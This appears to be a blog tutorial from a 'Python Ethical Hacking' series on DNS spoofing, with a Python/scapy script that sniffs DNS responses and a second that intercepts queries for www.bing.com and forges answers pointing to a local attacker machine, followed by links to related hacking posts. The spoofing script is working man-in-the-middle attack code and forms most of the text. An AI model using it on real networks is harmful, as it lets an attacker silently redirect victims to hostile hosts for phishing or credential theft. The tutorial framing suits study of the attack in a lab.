What is DNS Spoofing

Sniff the DNSRR packet and show on the terminal.

#!/usr/bin/env python

from netfilterqueue import NetfilterQueue

from scapy.layers.dns import DNSRR,IP

def process_packet(packet):

    scapy_packet = IP(packet.get_payload())

    if scapy_packet.haslayer(DNSRR):

        print(scapy_packet.show())

    packet.accept()

queue = NetfilterQueue()

queue.bind(0, process_packet)

try:

    queue.run()

except KeyboardInterrupt:

    print('')

Analyze the following DNSRR records.

###[ IP ]###

  version   = 4

  ihl       = 5

  tos       = 0x0

  len       = 218

  id        = 0

  flags     = DF

  frag      = 0

  ttl       = 64

  proto     = udp

  chksum    = 0x25e8

  src       = 10.0.0.1

  dst       = 10.0.0.43

  \options   \

###[ UDP ]###

     sport     = domain

     dport     = 42647

     len       = 198

     chksum    = 0x9388

###[ DNS ]###

        id        = 40073

        qr        = 1

        opcode    = QUERY

        aa        = 0

        tc        = 0

        rd        = 1

        ra        = 1

        z         = 0

        ad        = 0

        cd        = 0

        rcode     = ok

        qdcount   = 1

        ancount   = 3

        nscount   = 1

        arcount   = 0

        \qd        \

         |###[ DNS Question Record ]###

         |  qname     = 'www.bing.com.'

         |  qtype     = AAAA

         |  qclass    = IN

        \an        \

         |###[ DNS Resource Record ]###

         |  rrname    = 'www.bing.com.'

         |  type      = CNAME

         |  rclass    = IN

         |  ttl       = 2063

         |  rdlen     = None

         |  rdata     = 'a-0001.a-afdentry.net.trafficmanager.net.'

         |###[ DNS Resource Record ]###

         |  rrname    = 'a-0001.a-afdentry.net.trafficmanager.net.'

         |  type      = CNAME

         |  rclass    = IN

         |  ttl       = 414

         |  rdlen     = None

         |  rdata     = 'cn.cn-0001.cn-msedge.net.'

         |###[ DNS Resource Record ]###

         |  rrname    = 'cn.cn-0001.cn-msedge.net.'

         |  type      = CNAME

         |  rclass    = IN

         |  ttl       = 38

         |  rdlen     = None

         |  rdata     = 'cn-0001.cn-msedge.net.'

        \ns        \

         |###[ DNS SOA Resource Record ]###

         |  rrname    = 'cn-msedge.net.'

         |  type      = SOA

         |  rclass    = IN

         |  ttl       = 38

         |  rdlen     = None

         |  mname     = 'ns1.cn-msedge.net.'

         |  rname     = 'msnhst.microsoft.com.'

         |  serial    = 2017032701

         |  refresh   = 1800

         |  retry     = 900

         |  expire    = 2419200

         |  minimum   = 240

        ar        = None

Redirecting DNS Responses

#!/usr/bin/env python

from netfilterqueue import NetfilterQueue

from scapy.layers.dns import *

def process_packet(packet):

    scapy_packet = IP(packet.get_payload())

    if scapy_packet.haslayer(DNSQR):

        qname = scapy_packet[DNSQR].qname

        if "www.bing.com" in qname.decode(errors='ignore'):

            print("[+] Spoofing target")

            answer = DNSRR(rrname=qname, rdata="10.0.0.43")

            scapy_packet[DNS].an = answer

            scapy_packet[DNS].ancount = 1

            del scapy_packet[IP].len

            del scapy_packet[IP].chksum

            del scapy_packet[UDP].chksum

            del scapy_packet[UDP].len

            packet.set_payload(str(scapy_packet).encode())

    packet.accept()

queue = NetfilterQueue()

queue.bind(0, process_packet)

try:

    queue.run()

except KeyboardInterrupt:

    print('')

The set_payload() method does not work....

https://github.com/kti/python-netfilterqueue/issues/30

Python Ethical Hacking - DNS Spoofing的更多相关文章

  1. Python Ethical Hacking - ARP Spoofing

    Typical Network ARP Spoofing Why ARP Spoofing is possible: 1. Clients accept responses even if they ...

  2. Python Ethical Hacking - Bypass HTTPS(1)

    HTTPS: Problem: Data in HTTP is sent as plain text. A MITM can read and edit requests and responses. ...

  3. Python Ethical Hacking - WEB PENETRATION TESTING(1)

    WHAT IS A WEBSITE Computer with OS and some servers. Apache, MySQL ...etc. Cotains web application. ...

  4. Python Ethical Hacking - BACKDOORS(8)

    Cross-platform hacking All programs we wrote are pure python programs They do not rely on OS-specifi ...

  5. Python Ethical Hacking - NETWORK_SCANNER(2)

    DICTIONARIES Similar to lists but use key instead of an index. LISTS List of values/elements, all ca ...

  6. Python Ethical Hacking - NETWORK_SCANNER(1)

    NETWORK_SCANNER Discover all devices on the network. Display their IP address. Display their MAC add ...

  7. Python Ethical Hacking - MAC Address & How to Change(3)

    SIMPLE ALGORITHM Goal  -> Check if MAC address was changed. Steps: 1. Execute and read ifconfig. ...

  8. Python Ethical Hacking - MAC Address & How to Change(2)

    FUNCTIONS Set of instructions to carry out a task. Can take input, and return a result. Make the cod ...

  9. Python Ethical Hacking - MAC Address & How to Change(1)

    MAC ADDRESS Media Access Control Permanent Physical Unique Assigned by manufacturer WHY CHANGE THE M ...

随机推荐

  1. Qt布局的简单介绍

    1  介绍 参考视频:https://www.bilibili.com/video/BV1XW411x7NU?p=25 布局的好处:布局之后,改变主窗口大小,其余窗口可以自适应. 2  布局分类 垂直 ...

  2. 利用EasyMock生成数据库连接简单测试示例

    package demo.mock; import java.sql.Connection; import java.sql.PreparedStatement; import java.sql.Re ...

  3. QT5 解析JSON文件

    QT读JSON文件步骤,这里把过程记录一下,网上大多都是怎么写json的,对于读的,记录的不多 首先JSON文件格式必须为UTF-8(非UTF-8 with BOM),UTF-8 with BOM 即 ...

  4. jquery入门(3)

    4.jQuery中的事件绑定 4.1.事件绑定 on方法绑定 $('#box').on('click',function(){ alert(1); }) 直接绑定 $("#box" ...

  5. RocketMQ入门到入土(二)事务消息&顺序消息

    接上一篇:RocketMQ入门到入土(一)新手也能看懂的原理和实战! 一.事务消息的由来 1.案例 引用官方的购物案例: 小明购买一个100元的东西,账户扣款100元的同时需要保证在下游的积分系统给小 ...

  6. c# 线程的优先级

    前言 有时候我们希望某个线程更加重要,希望让其先运行的话.c#为我们提供了线程修改优先级.但是这样的效果有多大呢? 正文 直接放代码: static void Main(string[] args) ...

  7. STL标准函数库学习小总结

    浅谈STL(未完)前言:(1)学习资料——<算法笔记>第六章.<常用基础数据结构>文档 (2)测试平台——Codeup新家(<算法笔记>对应OJ).洛谷.YCOJ ...

  8. JavaScript图形实例:Hilbert曲线

    德国数学家David Hilbert在1891年构造了一种曲线,首先把一个正方形等分成四个小正方形,依次从西北角的正方形中心出发往南到西南正方形中心,再往东到东南角的正方形中心,再往北到东北角正方形中 ...

  9. SCOI 2009 围豆豆(状压DP)

    SCOI 2009 围豆豆 题目描述 是不是平时在手机里玩吃豆豆游戏玩腻了呢?最近MOKIA手机上推出了一种新的围豆豆游戏,大家一起来试一试吧. 游戏的规则非常简单,在一个N×M的矩阵方格内分布着D颗 ...

  10. 分享一个集成.NET Core+Swagger+Consul+Polly+Ocelot+IdentityServer4+Exceptionless+Apollo+SkyWalking的微服务开发框架

    集成.NET Core+Swagger+Consul+Polly+Ocelot+IdentityServer4+Exceptionless+Apollo的微服务开发框架 Github源代码地址 htt ...